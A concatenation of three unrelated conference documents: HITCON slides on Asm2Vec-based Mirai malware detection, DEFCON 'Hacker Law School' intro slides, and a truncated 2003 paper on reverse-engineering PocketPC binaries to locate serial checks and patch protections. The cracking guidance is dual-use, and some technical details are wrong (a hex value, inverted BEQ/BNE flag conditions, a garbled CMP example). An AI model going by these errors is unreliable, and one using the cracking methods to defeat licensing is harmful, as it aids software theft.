” we drink wine. “
” I drink beer. “
[email protected]
/?semantics
” we drink wine. “
” I drink beer. “
” we guzzle wine. “
” I guzzle beer. “
[email protected]
/?tokenFreq
[email protected]
/?freq
drink
guzzle
cat
dog
puppy
[email protected]
/?cos(θ)
King
Man
θ
[email protected]
• Co-Occurrence Matrix
- count based, token frequency
- able to capture lexical semantic
- Cosine Similarity
• Issues
- vocabulary
- online training
→ Paragraph Vector Distributed Memory (PV-DM)
#semantics
[email protected]
〉〉〉Word2Vec
[email protected]
/?tokenFreq
drink
behavior
[email protected]
/?tokenFreq
4 dim
[email protected]
#Sim
[email protected]
#Sim
similar()
=
0.13*0.13 + 0.01*0.01 + 0.99*0.93 + 0.01*0.01
———————————————————————————————————————————————
sqrt(0.13^2 + 0.01^2 + 0.99^2 + 0.01^2)
x
sqrt(0.13^2 + 0.01^2 + 0.93^2 + 0.01^2)
=
0.9999650034397828
[email protected]
#Sim
more similar
[email protected]
#Sim
sim(King - Man) ≒ sigmoid(King・Man)
King
Man
[email protected]
#Sim
King
Man
Δ
sim(King - Man) ≒ sigmoid(King・Man)
[BACKWARD]: Man = Man - Δ(King - Man) * learningRate
Δ(King - Man) = (1 - sim(King - Man))・King
[email protected]
#negative
King
Man
sim(King - Man) ≒ sigmoid(King・Man)
[BACKWARD]: Man = Man - Δ(King - Man) * learningRate
Δ(King - Man) = sim(King - Man)・King
[email protected]
#PV-DM
[email protected]
#Word2Vec
[email protected]
〉〉〉Asm2Vec
[email protected]
#Asm2Vec
[email protected]
#paragraph
File Headr Opt Header
.AddressOfEntryPoint
.text
mov [ebp-0x04], 00
jmp block_c
cmp [ebp-0x04], Ah
jg Exit
push 0x3E8
call Sleep
jmp block_b
mov eax, [ebp-0x04]
add eax, 1
mov [ebp-0x04], eax
cmp [ebp-0x04], Ah
jg Exit
push 0x3E8
call Sleep
jmp block_b
...
asmscript
[email protected]
#Asm2Vec
[email protected]
#PE
File Headr Opt Header
.AddressOfEntryPoint
.text
6A 00
68 AD DE 00 00
68 EF BE 00 00
6A 00
FF 15 FE CA 00 00
33 C0
C3
Control Flow Graph
[email protected]
#1: block_a → block_c → Exit
#2: block_a → block_c → block_d →
block_b → block_c → Exit
#3: block_a → block_c → block_d →
block_b → block_c → block_d →
block_b → block_c → Exit
#4: block_a → block_c → block_d →
block_b → block_c → block_d →
block_b → block_c → block_d →
block_b → block_c → Exit
/?rndWalk
mov [ebp-0x04], 00
jmp block_c
cmp [ebp-0x04], Ah
jg Exit
mov eax, [ebp-0x04]
add eax, 1
mov [ebp-0x04], eax
block_c:
block_b:
block_a:
jmp block_c
push 0x3E8
call Sleep
jmp block_b
jmp block_b
block_d:
jg Exit
[email protected]
mov [ebp-0x04], 00
jmp block_c
cmp [ebp-0x04], Ah
jg Exit
push 0x3E8
call Sleep
jmp block_b
mov eax, [ebp-0x04]
add eax, 1
mov [ebp-0x04], eax
cmp [ebp-0x04], Ah
jg Exit
push 0x3E8
call Sleep
jmp block_b
...
/?rndWalk
mov [ebp-0x04], 00
jmp block_c
cmp [ebp-0x04], Ah
jg Exit
mov eax, [ebp-0x04]
add eax, 1
mov [ebp-0x04], eax
block_c:
block_b:
block_a:
jmp block_c
push 0x3E8
call Sleep
jmp block_b
jmp block_b
block_d:
jg Exit
asm
script
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
mov rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
sub rsp, 138h
lea eax, [ebx+4]
push rbp
vocab = {
'sub': [-0.53, 0.01 ... -0.08],
'rsp': [ 0.12, 0.31, ... 0.34],
'lea': [-0.75,-0.42, ... -0.72],
'push': [ 0.23, 0.37, ... -0.23],
'[ebx+4]':[-0.02,-0.19, ... 0.11],
...
}
Tokenize
200 dim
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
sub rsp, 138h
operands
lea eax, [ebx+4]
push rbp
...
operator
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
sub rsp, 138h
operands
operator
Ƭ(sub) || ( Ƭ(rsp)/2 + Ƭ(138h)/2 )
Ƭ(instruction) =
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
...
push rbp
operands
operator
Ƭ(instruction) = Ƭ(push) || ( Ƭ(rbp) )
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
mov [rbp+04h], 0
mov [rbp+32h], 1505h
nop
nop (null)
operands
operator
Ƭ(instruction) = Ƭ(nop) || ( null )
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
...
Ƭ("sub rsp, 138h")
Ƭ(rsp)
[-0.53, 0.01 ... -0.08]
sigmoid(x)
Avg(x)
Ƭ(rbp)
Ƭ(mov)||
[-0.53, 0.01 ... -0.08]
Ƭ(8h)
Avg(x)
Ƭ(rax)
Ƭ(mov)||
[-0.53, 0.01 ... -0.08]
predict
θfs
Avg(x)
[email protected]
#Asm2Vec
push rbp
mov rbp, rsp
sub rsp, 138h
mov rax, 8h
mov [rbp+0ch], rax
xor eax, eax
...
Ƭ("sub rsp, 138h")
Ƭ(rsp)
[-0.53, 0.01 ... -0.08]
sigmoid(x)
Avg(x)
Ƭ(rbp)
Ƭ(mov)||
[-0.53, 0.01 ... -0.08]
Ƭ(8h)
Avg(x)
Ƭ(rax)
Ƭ(mov)||
[-0.53, 0.01 ... -0.08]
loss
θfs
loss1/3
loss1/3
loss1/3
Avg(x)
[email protected]
• Dataset
- malware: Mirai samples from VirusTotal (40000+)
- benign: ELF from Linux-based IoT firmware (3600+)
- stripped binary
• Training
- random choose only 25 Mirai samples to train
- each token represented by 200-dim vector (random)
- negative sampling: 25 tokens
- decreasing learning rate: 0.025 → 0.0025
• Cross validation: 10 times
• Malicious: Similarity(binary, model) >= 95%
$./exp
[email protected]
• MIPS
- Mirai: 96.75% (18467 samples)
- Benign: 96.41% (348 samples)
• x86
- Mirai: 96.75% (2564 samples)
- Benign: 99.93% (1567 samples)
• ARM
- Mirai: 98.53% (23827 samples)
- Benign: 93.87% (1699 samples)
$./exp
/>Demo
[email protected]
〉〉〉Challenge
[email protected]
/!challenge
github.com/aaaddress1/theArk
[email protected]
/!PluginX
DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry
[email protected]
int main(void) {
try {
*(char*)NULL = 1;
} catch (...) {
puts("Hell Kitty");
}
}
/!challenge
[email protected]
/!challenge
github.com/xoreaxeaxeax/movfuscator
[email protected]
• Issue based on Control Flow Walking
- Self modifying code
1. Software Packer e.g. VMProtect, Themida
2. Shellcode Encoder
- Control Flow Rerouting
1. Error handling e.g. SEH
2. MultiThread
- Exported malicous function
- Virtual Method Table
• Vector Obfuscation
- 95% benignware / 5% injected shellcode
- Use common instructions as gadgets
to build a obfuscation chain e.g. movfuscator
/!challenge
41414141414141414141414141
Thanks!
[email protected]
Slide
Github
@aaaddress1
Facebook
AAAAAAAAAAAAAA AAAAAAA AAAA
HITCON | pdf |
Hacker Law School
"We went to law school so you don't have to"
2013 Summer Quarter
D E F C O N
Faculty Bio
Marcia Hofmann
• Currently solo digital rights attorney
• 7 Years at the EFF
• 3 Years at EPIC
• Adjunct faculty at the University of California
Hastings College of Law in San Francisco
• Licensed to practice law in CA, DC
Faculty Bio
Jim Rennie
• 3 years doing Internet privacy compliance &
policy work in San Francisco
• 3 years as a Public Defender in Las Vegas
• Prior to law school, 3 years as a web developer
• Attended way too many hacker cons over the last
14 years
• Licensed to practice law in CA, NV
Disclaimers
I am not YOUR attorney
• Nothing you say to me is covered by attorney-
client privilege
• I don't know enough about your particular
situation to advise you personally
This is not "legal advice"
• This is a very general overview and may not
apply to you or your specific situation
• Don't get your legal advice from someone at a
con (even if we're correct about the law)
What is Hacker Law School?
The basic legal education you need
(and should’ve been taught in high school),
customized for the hacker community
What You're Going to Learn
The basics of:
Intellectual Property
Criminal/Civil Substantive Law
Criminal Procedure
How the law applies to real life situations
Why learn about these laws?
If you're doing online security research,
you need to be able to understand the risks.
What do you mean by "risk"?
A couple distinct, separate things.
(1) The likelihood of becoming an attractive target for
a lawsuit or prosecution, either with or without basis.
(2) The likelihood that a court might decide that
you’ve run afoul of the law.
What You're NOT Going to Learn
Anything other than the basics for risk-spotting
To be afraid
Feedback
Hacker Law School is always changing,
updating, and making itself better
Please let us know if you have questions
or suggestions for improvement
[email protected]
[email protected] | pdf |
Page 1 of 1 © 2003 Airscanner™ Corp. http://www.Airscanner.com
Embedded Reverse Engineering:
Cracking Mobile Binaries
1. Overview
Reverse-engineering has long been one of the most popular trouble shooting techniques.
In fact, long before the first hacker ever laid eyes on a computer screen, technicians,
engineers, and even hobbyists were busy tearing apart mechanical devices to see if they
could deduce their seemingly magical operations with the hopes of making it work better,
or at the very least, hoping they could understanding what made a device tick. Over the
years, this concept has been passed on to the computer profession, where the concept of
reverse-engineering evolved into one of the most powerful methods of learning available.
Ironically, this very useful technique has fallen under attack and is being threatened by
various nefarious Acts and policy control groups.
If a computer professional has been in the field for any length of time, they have already
used reverse-engineering to their benefit. In fact, the open-source community uses
reverse-engineering as one of their main tools for learning software and figuring out what
a program does, or in some cases, doesn't do. However, there is one major branch of
computing that has had little headway in the arena of reverse-engineering. This elusive
niche is the PocketPC application.
To help fill this gap, and to increase the awareness of PocketPC reverse-engineering, this
paper/discussion will provide an overview of what is required, and how one can reverse
their PocketPC. The following pages will provide an overview of the PocketPC
environment, the tools required to successfully reverse-engineering Windows CE, and the
methods by which a person can dig deep inside an application to alter code as they see fit.
Note, this article/discussion will skirt the borders of many ethical and moral issues. The
Page 2 of 2 © 2003 Airscanner™ Corp. http://www.Airscanner.com
information in this paper is presented from a researchers point of view for educational
purposes only. We firmly believe that when a product is purchased, be it a can of soup or
software program, the owner should be able to do with it as they please, with the arguable
exception of manipulative EULA in which the software is rented. Please note, the
information presented is not meant to promote the theft of software.
2. Windows CE Architecture
Windows CE is the operating system of choice for most pocket PC devices. As such, it is
important to understand the basics of how this operating system works to become
proficient at reverse engineering on the PPC platform. This segment of the paper will
outline the particulars of Windows CE, and what it means to you when researching the
characteristics of a program. Note, this segment will only briefly cover the Windows CE
architecture, with some deeper looks at sections important to understand when reverse-
engineering a program. For more information about this subject, the Microsoft.com
provides a wealth of information. Please note that much of this information can be
applied to any Windows OS; therefore, please feel free to jump ahead if you are familiar
with this subject.
2.1 Processors
In this world of miniature gadgets, only so much is possible. Physical properties often
determine how far technology can go. In the case of the pocket PC's this is also true. Heat
generated by high-speed processors in notebook PC's have been known to burn people
and even has provided enough heat to fry eggs. If the same processor were used in a
pocket PC, a user would have to wear hot pads to operate just to hold it.
As a result, Windows CE devices are limited in their choice of processors. The following
is the list of processors supported by Windows CE.
ARM: Supported processors include ARM720T, ARM920T, ARM1020T,
StrongARM, XScale
MIPS: Supported processors include MIPS II/32 w/FP, MIPS II/32 w/o FP,
MIPS16, MIPS IV/64 w/FP, MIPS IV/64 w/o FP
SHx: Supported processors include SH-3, SH-3 DSP, SH-4
x86: Supported processors include 486, 586, Geode, Pentium I/II/III/IV
If heat dissipation is a serious issue, the best choice is one of the non-x86 processors that
use a reduced level of power. The reduction in power consumption will reduce the
amount of heat that is created during processor operation, but also limits the processor
speed.
2.2 Kernel, Processes, and Threads
The follow section will describe the core of the Windows CE operating system, and how
it processes information.
Page 3 of 3 © 2003 Airscanner™ Corp. http://www.Airscanner.com
2.2.1 Kernel
The kernel is the key component of a Windows CE device. It handles all the core
functions of the OS, such as process, thread and memory management. In addition, it also
handles scheduling and interrupt handling. However, it is important to understand that
Windows CE used parts of the desktop Windows software. This means it has a similar
threading, processing, and virtual memory model as the other Windows OSes.
While the similarities are undeniable, there are several items that make this OS a
completely different beast. These center on the use of memory and the simple fact that
there is no hard drive (discussed later in the Memory Architecture section). In addition,
DLLs in Windows CE are not implemented as they are in other Windows operating
systems. Instead, they are used in such a way as to maximize the amount of available
memory. By integrating them into the core operating system, DLLs don't take up precious
space when they are executed. This is an important concept to understand before
attempting to RVE a program in Windows CE. Due to this small difference, attempting to
break a program while it is executing a system DLL is not allowed by Microsoft's EVT
(MVT).
2.2.2 Processes
A process in Windows CE represents an executing program. The number of processes is
limited to 32, but each process can execute a theoretically unlimited number of threads.
Each thread has a 64k memory block assigned to it, an ID, and a set of registers. It is
important to understand this concept because when debugging a program, you will be
monitoring the execution of a particular thread, its registers, and the allotted memory
space. By doing this, you will be able to deduce hidden passwords, serial numbers, and
more.
Processes can run in two modes; kernel and user. A kernel process has direct access to
the OS and the hardware. This gives it more power, but a crash in a kernel process will
often crash the whole OS. A user process, on the other hand, operates outside the kernel
memory, but a crash will only kill the running program, not the whole OS. In Windows
CE, any 3rd party program will operate in user mode, which means it is protected. In other
words, if you crash a program while RVEing it, the whole OS wont crash (though you
still may need to soft boot the device).
There are two other points that should be understood. First, one process cannot affect
another processes data. While related threads can interact with each other, a process is
restricted to its own memory slot. The second point to remember is that each existing
thread is continuously being stopped and restarted by a scheduler (discussed next). This is
how multitasking is actually performed. While it may appear that more than one program
is running at a time, the truth remains that only one thread may execute at any one time.
2.3 Scheduler
Page 4 of 4 © 2003 Airscanner™ Corp. http://www.Airscanner.com
The Scheduler is responsible for managing the thread process time. It does this by giving
each thread a chance to use the processor. By continuously moving from thread to thread,
the scheduler ensures that each gets a turn. Built into the scheduler are three important
features that are important to understand.
The first feature is a method that is used to increase the amount of processor time. The
secret is found in multi-threading an application. Since the Scheduler assigns processor
time at the thread level, a process with 10 threads will get ten times the processor time
than a process with one thread.
Another method in gaining more processor time is to increase the process priority.
However, this is not encouraged unless necessary. Changing priority levels can cause
serious problems in other programs, and will affect the speed of the computer as a whole.
One priority that needs to be mentioned is the THREAD_PRIORITY_TIME_CRITICAL
priority that forces the processor to complete the critical thread until it is complete.
The final interesting fact deals with a problem that can arise when priority threading is
used. If a low priority thread is executing and it ties up a resource needed by a higher
priority thread, the system could become instable. In short, this creates a paradox where
the high thread will wait for the low thread to finish, which is in turn waiting on the high
to complete. To prevent this from occurring, the scheduler will detect such a paradox and
boost the lower priorities thread to a higher level allowing it to finish.
2.4 Memory Architecture
One of the most obvious properties of a device running Windows CE is that it doesn't
have a hard drive. Instead of spinning disks, pocket PC's use old fashion RAM (Random
Access Memory) and ROM (Read Only Memory) to store data. While this may seem like
a step back in technology, the use of static memory, like ROM, is on the rise and will
eventually make moving storage devices obsolete. The next few paragraphs will explain
how memory is used in a Windows CE device to facilitate program execution and use.
In a Windows CE device, the entire operating system is stored in ROM. This type of
memory is typically only read from and is not used to store temporary data that can be
deleted. On the other hand, data in RAM is constantly being updated and changed. This
memory is used to hold all files and programs that are loaded into the Windows CE-based
device, as well as the registry and various data files required by CE applications.
RAM not only stores data, but it is also used to execute programs. When a 3rd party
program is executed, it is first uncompressed, then copied into another part of RAM, and
executed from there. This is why having a surplus of RAM is important in a Windows CE
device. However, the real importance of RAM is found in the fact that its data can be
written to and accessed by an address. This is necessary because a program will often
have to move data around. Since a program is allotted a section of RAM to run in when it
is executed, it must be able to write directly to its predefined area.
Page 5 of 5 © 2003 Airscanner™ Corp. http://www.Airscanner.com
While ROM is typically only used as a static storage area, in Windows CE it can be used
to execute programs, which is know as Execute In Place (XIP). In other words, RAM
won't be required to hold the ROMs data as a program executes. This allows RAM to be
used for other important applications. However, this only works with ROM data that is
not compressed. While compression will allows more data to be stored in ROM, the
decompression will force any execution to be done via the RAM.
RAM in a Windows CE device is split between two functions. The first is object store,
which is used to hold files/data that is used by the programs, but is not stored in the
ROM. In particular, the object store holds compressed program/user files, database files
that hold structured data, and the infamous Windows registry file. Though this data is
stored in RAM, it remains intact when the device is 'turned off'. This is due to the fact
that the RAM is kept charged by the power supply, which is why it is very important to
never ever let the charge on a pocket PC completely die. If this happens, the RAM will
loose power and will reset. This will then dump all installed programs and will basically
wipe everything on the device except for what is stored in ROM. This is also referred to
as a hard boot when dealing with a pocket PC device.
The second function of the RAM is to facilitate program execution. As previously
mentioned, when a program is running it needs to store information it is using. This is the
same function that RAM serves on a typical desktop PC. However, this also means that
any data passing through a program, such as a password or serial number, will be written
to the RAM at one time or another.
Windows CE does have a limit on the RAM size. In Windows CE 3.0 it is 256 MB with a
32 MB limit on each file, but in Windows CE .NET this value has been increased to a
rather large 4GB. In addition, there is a limit to the number of files that can be stored in
RAM of 4,000,000. There are other limits, such as the number of programs that can
operated at the same time, which brings us to multitasking.
Windows CE was designed to be a multitasking operating system. Just like other
Windows operating systems, this is important to allow more than one program to be open
at a time. In other words, you can listen to an MP3 while taking notes, and checking out
sites on the Internet. Without multitasking, you would be forced to close one program
before opening another. However, you must be careful opening to many programs in a
Windows CE device. Since you are limited by the amount RAM in the device and each
open program takes up a chunk of the RAM, you can quickly run out of space.
Finally, the limitation of RAM in a pocket PC also has impacted the choice of operating
system. Since Windows CE devices only have 32-128 MB of internal RAM, they don't
make good platforms for operating systems that use a lot of memory, such as Embedded
Windows XP. In this OS, the minimum footprint for a program is 5MB. On the other
hand, Windows CE only requires 200k; this is a 2500% difference. When RAM is limited
by space and pricing considerations, the affects are far reaching.
Page 6 of 6 © 2003 Airscanner™ Corp. http://www.Airscanner.com
2.5 Graphics, Windowing and Event Subsystem (GWES)
This part of the Windows CE architecture is responsible for handling all the input (e.g.
stylus) and output (e.g. screen text and images). Since every program uses windows to
receive messages, this is a very important and key part of Windows CE. As a result, this
is also one of the key areas you need to understand to successfully RVE a program.
Without going into too much detail, you should know that every Windows CE process
created when a program executes is assigned its own windows messaging queue. This
queue is similar to a stack of papers, which is added to and read from. This queue is
created when the program calls GetMessage, which is very common in Windows CE
programs. While the program executes and interacts with the user, messages are placed
on and removed from the queue. The following is a list and explanation of the common
commands that you will see while RVE.
PostMessage
Places message on queue of target thread, which is returned immediately to the
process/thread.
SendMessage
Places message on queue, but does not return until it is processed.
|SendThreadMessage
Sends messages directly to thread instead of the queue
These Message commands, and others, act as virtual flares when RVE a program. For
example, if a “Sorry, wrong serial number” warning is flashed to the screen, you can bet
that some Message command is used. Therefore, by looking for the use of this command
in a disassembler, you can find the part of the program that needs further research.
2.6 Summary
The last few pages have given you an inside look at how Windows CE operates. This
information is required reading for the rest of this paper. In fact, by understanding how a
processor deals with threads, the memory architecture, and how Windows CE uses
messages to communicate with the executing program, you will have an easier time
understanding how RVE works. Just as a doctor must understand the human body before
troubleshooting even a head ache, a RVE must understand the platform they are
dissecting if they going to be successful at making at patch or deciphering a serial
number.
3 Reverse Engineering Fundamentals
3.1 Overview
When a developer writes a program, they typically use one of several languages. These
typically include Visual Basic, C++, Java or any one of the other lesser used languages.
Page 7 of 7 © 2003 Airscanner™ Corp. http://www.Airscanner.com
The choice of language depends on several factors. The most common being space and
speed considerations. In the infamously bloated Windows environment, Visual Basic is
arguable the king. This is because the hardware required to run Windows is usually more
than enough to run any Visual Basic application. However, if the programmer needs a
higher level of speed and power, they will probably select C++.
While these upper level languages make programming easier by providing a whole
selection of Application Program Interfaces (API) and commands that are easy to
understand, there are many occasions where a programmer must create a program that
can fit in a very small amount of memory, and operate extremely quickly. To meet this
goal, they will choose to use a language known as Assembler. This low level language
allows a coder to write directly to the processor, thus controlling the hardware of the
computer directly. However, programming in assembler is very tedious and must be done
within a very explicit set of rules.
As we have hinted, programming languages exist on several different levels. The lowest
level languages speak right to the hardware, and typically require little in the way of
conversion. On the other hand, upper level languages like VB and SQL are often easy to
write. However, these languages must be compiled one or more times before the
instructions can be understood by the hardware responsible for executing it. In fact, many
of these upper level languages don't really have any way of controlling hardware, but
must make calls to other files and programs that can make hardware calls in proxy.
Without going to deep into the nuances of programming languages, the point of this
discussion is to ensure that you understand that almost every program will end up as
assembler code. Due to this, if you really want to have control over a computer and the
programs on the computer, you must understand assembler code. Since each and every
processor type uses its own set of assembler instruction, you need to focus on one device
(i.e. one processor type) and become fluent in the operation codes (opcodes), instruction
sets, processor design, and how the processor uses internal memory to read and write to
RAM. It is only after you have mastered the basics of the processor operation that you
can start to reverse-engineer a program. Fortunately, most processors operate very similar
to each other, with slight variations in syntax and use of internal processor memory.
Since our target processor is the ARM processor used by PDA's, we will provide some of
the necessary information you need to know, or at least be familiar with, before
attempting to study a program meant to run on this processor type. The next few pages
will provide you with a description of the ARM processor, its major op codes, their HEX
equivalent, and how the memory is used. If you do not understand this information, you
may have some difficulty in following the rest of this paper.
3.2 Hex vs. Binary
To successfully RE a program, there are several concepts that you must understand. The
first is that no matter what programming language a file is written in, it will eventually be
converted to a language that the computer can understand. This language is known as
Page 8 of 8 © 2003 Airscanner™ Corp. http://www.Airscanner.com
binary and exists in a state of ones and zeros. For example, the word “HACKER” in
binary is written as follows:
H
A
C
K
E
R
01001000
01000001
01000011
01001011
01000101
01010010
While people did code in binary at one time, this is very rare in today's interface based
world. In fact, many operating systems do not display, store, or even transmit this binary
information, as it really exists; instead, they use a format known as HEX.
Hex, while still very cryptic, shortens the process of transmitting data by converting the 8
digit binary byte, into a 2 character hex value. For example, the previously illustrated
word “HACKER” in binary would equate to the following in hex:
H
A
C
K
E
R
48
41
43
4B
45
42
In addition to the space considerations, experienced computer programmers can easily
understand hex characters. In fact, with nothing more than a simple hex editor, a
knowledgeable hacker can open an executable file and alter the hex code of the file to
remove protection, alter a programs appearance, or even install a Trojan. In other words,
understanding hex is one of the main requirements of being able to reverse-engineer a
program. To facilitate you in your endeavors, an ASCII/Binary/hex chart has been
included in the appendix of this book. In addition to this, you can find several conversion
web pages and programs online, and if all else fails, the Windows calculator will convert
hex to binary to decimal to octal, once it has been set to scientific mode.
3.3 The ARM Processor
The Advanced RISC Microprocessor (ARM) is a low-power 32 bit microprocessor based
on the Reduced Instruction Set Computer (RISC) principles. In particular, the ARM is
used in small devices that have a limited power source and low threshold for heat, such as
PDA's, telecommunication devices, and other miniature devices that require a relatively
high level of computing power.
3.3.1 Registers
There are a total of 37 registers within this processor that are used to hold values used in
the execution of code. Six of these registers are used to hold status values needed to hold
the results of compare and mathematical operations, among others. These leaves 31 left
to the use of the program, of which a max of 16 are generally available to the
programmer. Of these 16, Register 15 (R15) is used to hold the Program Counter (PC),
which is used by the processor to keep track of where in the program it is currently
executing. R14 is also used by the processor as a subroutine link register (Lr), which is
used to temporarily hold the value held by R15 when a Branch and Link (BL) instruction
is executed. Finally R13, known as the Stack Pointer (Sp), is used by the processor to
Page 9 of 9 © 2003 Airscanner™ Corp. http://www.Airscanner.com
hold the memory address of the stack, which is used to store all values about to be used
by the processor in it execution.
In addition to these first 16 registers, a debugger allows the programmer to monitor the
last four registers (28-31), which are used to hold conditional values. These registers are
used to hold the results of arithmetic and logical operations performed by the processor
(e.g. addition, subtraction, compares, etc.). The following lists the register and its
name/purpose. They are listed in descending order due to the fact that the processor bits
are read from high to low.
R31: Negative / Less Than
R30: Zero
R29: Carry / Borrow / Extend
R28: Overflow
Understanding these registers is very important when debugging software. By knowing
what each of these values means, you can be sure to know the next step the program will
make. In addition, using a good debugger, you can often alter these values on the fly, thus
maintaining 100% control over how a program flows. The following is a table of the
possible values and their meanings.
Value
Meaning
EQ
– Z set (equal)
NE
– Zero clear (not equal)
CS
– Carry set (unsigned higher or same)
CC
– Carry clear (unsigned lower)
MI
– Negative set
PL
– Negative clear
VS
– Overflow set
VC
– Overflow clear
HI
– Carry set and Zero clear (unsigned hi)
LS
– Carry clear and Zero set
(unsigned lo or same)
GE
– Negative set and Overflow set
or Negative clear and Overflow clear (>=)
LT
– Negative set and Overflow clear
or Negative clear and Overflow set (<)
GT
– Zero clear, and either Negative set and
Overflow set, or Negative clear and
Overflow clear (>)
LE
– Zero set, and either Negative set and
Overflow clear, or Negative clear and
Page 10 of 10 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Value
Meaning
Overflow set (<=)
AL
– Always
NV
– Never
Table 1: ARM Status Codes
Figure 1 illustrates Microsoft's eMbedded Visual Tools (MVT) debugger showing us the
values held in registers 0-12, Sp, Lr, and PC. In addition, this figure also let’s us see the
four registers (R31-R28) used to hold the conditional values. See if you can determine the
current status of the program using table 1.
Figure 1: EVT illustrating the the registers
Now that you understand how the status flags are updated, the following will help you
put that knowledge to some practical use. Again, being able to recognize how a program
works is essential to reverse-engineering.
Example Scenario #1
CMP #1, #0
In this case you can see that we are comparing two simple values. In real life, the #1
would be represented by a register (e.g. R0, R3, etc.), and #0 would be either a value or
another register. To determine how this comparison will alter the status flags, use the
following set of questions.
N: If #1 < #0 then N = 1, else N = 0 N = 0
Page 11 of 11 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Z: If #1 = #0 then Z = 1, else Z = 0 Z = 0
C: If #1 >= #0 then C = 1, else C = 0 C = 1
O: Was there an error in the calculation, if so, O = 0 O = 0
Using the above, determine the following.
CMP 23, 36
Negative: If 23 < 36 then N = 0, else N = 0 N = 1
Zero (Equal): If 23 = 36 then Z = 1, else Z = 0 Z = 0
Carry: If 23 >= 36 then C = 1, else C = 0 C = 0
Overflow: Was there an error in the calculation, if so, O = 0 O = 0
Now that you see how this work in the case of a CMP, we need to look at how the status
flags are updated in other situations. The next will illustrate how the flags are updates in
the case of a MOVS opcode and an ANDS opcode.
MOVS R1, R0
In this case, you need to look at the status flags as they are labeled and update them
according to the value of R0. Use the following steps to determine the outcome.
N: If R0 < 0 then N = 1, else N = 0
Z: if R0 = 0 then Z = 1, else Z = 0
Two things to note from this example, the first is that R0 has to be a negative number for
the N flag to be set. This is possible, but only if the binary value starts with a 1. One
common value you will see is 0xFFFFFFFF. The second item to note is that the carry
value is not updated using the MOVS opcode.
ANDS R1, R0, 0xff
In the case of an ANDS opcode, the results are similar to that of the MOVS opcode. The
R0 value is used to determine the flags’ status. Use the following to determine the output
of the N and Z flags.
N: If R0 < 0 then N = 1, else N = 0
Z: if R0 = 0 then Z = 1, else Z = 0
There are many other opcodes that update the status flags. Some opcodes are implicit and
do not require the specification of the ‘S’. These update the status flags similar to the
CMP opcode. The opcodes that have an explicit ‘S’ operate like the MOVS example.
3.3.2 ARM Opcodes
The ARM processor has a pre-defined set of operation codes (opcodes) that allows a
programmer to write code. These same opcodes are used by compilers, such as
Microsoft's EVC, when a program is created for an ARM device. In addition to creating
Page 12 of 12 © 2003 Airscanner™
Corp. http://www.Airscanner.com
programs, the opcodes are also used when a program is disassembled and/or debugged.
For this reason, it is important that you have a understanding of how opcodes are used,
and be able to recognize at least the most common opcodes, as well as what operation
they perform. The more you are familiar with the opcodes, the easier it will be to
determine what the code is doing. In addition, it is also important for you to have some
reference of the hex equivalent of an opcode. You will need this to find and replace an
opcode as it appears in a hex dump of the file. While practice will ingrain the popular
opcodes into your memory, this short discussion will help get you started.
3.3.2.1 Branch (B)
The Branch opcode tells the processor to jump to another part of program, or more
specifically the memory, where it will continue its execution. The B opcode is not to be
confused with the Branch with Link (BL) opcode discussed next. The main difference is
found in the fact that the B opcode simply is a code execution redirector. The program
will jump to the specified address and continue processing the instructions. The BL
opcode also redirects to another piece of code, but it will eventually jump back to the
original code and continue executing where it left off.
There are several variations of the B opcode, most of which make obvious sense. The
following is a list of the three most common variants and what they mean. Note that this
list relates to the condition table in the previous section. In addition, we have also
included the hex code that you will need to search for when altering a branch operation.
This is only a partial list. For a full list please visit the references section at the end of this
paper.
B
Branch
Always branches
XX XX XX EA
BEQ
B if equal
B if Z flag = 0
XX XX XX 0A
BNE
B if no equal
B if Z flag = 1
XX XX XX 1A
Examples:
B
loc_11498
07 00 00 EA
BEQ
loc_1147C
0C 00 00 0A
BNE
loc_11474
06 00 00 1A
3.3.2.2 Branch with Link (BL)
When a program is executing, there are situations where the program must branch out
and process a related piece of information before it can continue with the main program,
such as system calls (i.e. a message box). This is made possible with a Branch with Link
opcode. Unlike its relative, the B opcode, BL always returns back to the code it originally
was executing. To facilitate this, register 14 is used to hold the original address from
